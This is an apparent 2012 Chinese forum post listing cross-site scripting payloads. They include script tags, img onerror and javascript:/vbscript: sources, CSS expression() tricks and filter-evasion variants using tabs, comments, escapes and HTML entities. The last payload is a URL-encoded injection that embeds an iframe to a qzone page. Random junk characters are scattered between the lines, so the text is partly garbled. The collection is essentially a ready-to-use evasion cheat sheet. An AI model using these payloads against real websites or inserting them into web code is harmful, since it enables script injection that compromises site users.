<script>alert("跨站")</script> (最常用)
8 r3 W$ C( o, Z4 O5 H' D<img scr=javascript:alert("跨站")></img>/ m0 u; I7 @+ W! c V# W5 d. Y! t& E
<img scr="javascript: alert(/跨站/)></img>0 w- U! u5 W0 ]; n% R; x& p7 `" {
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
5 G7 b' z6 X& _ w+ {$ ^<img scr="#" onerror=alert(/跨站/)></img>
0 |" m; w! X% y3 O: S. M" U<img scr="#" style="xss:expression(alert(/xss/));"></img>7 v, Q) B9 E, ]6 H9 Z
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
D/ Z& a1 Q) B' @<img src=vbscript:msgbox ("xss")></img>0 z# ?( |* \5 X$ ~
<style> input {left:expression (alert('xss'))}</style>2 f8 Y4 v6 k+ M4 J8 ?
<div style={left:expression (alert('xss'))}></div>$ q; e6 t" T/ o. V+ O5 H
<div style={left:exp/* */ression (alert('xss'))}></div>
+ ?) _) |9 O! m3 N! N. o% b$ A<div style={left:\0065\0078ression (alert('xss'))}></div>
% A, i1 G2 A4 V( F1 V7 Y2 khtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
: Q; L- j/ g/ i6 J& H- H% H, Cunicode <div style="{left:expRessioN (alert('xss'))}">! T+ I m7 ~! S* y# [7 a3 M; o+ j
; J" v6 N$ O' Z8 G* _! c0 \"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
j: [( @; J, p |
发表于 2012-9-13 17:15:04
收藏
支持
反对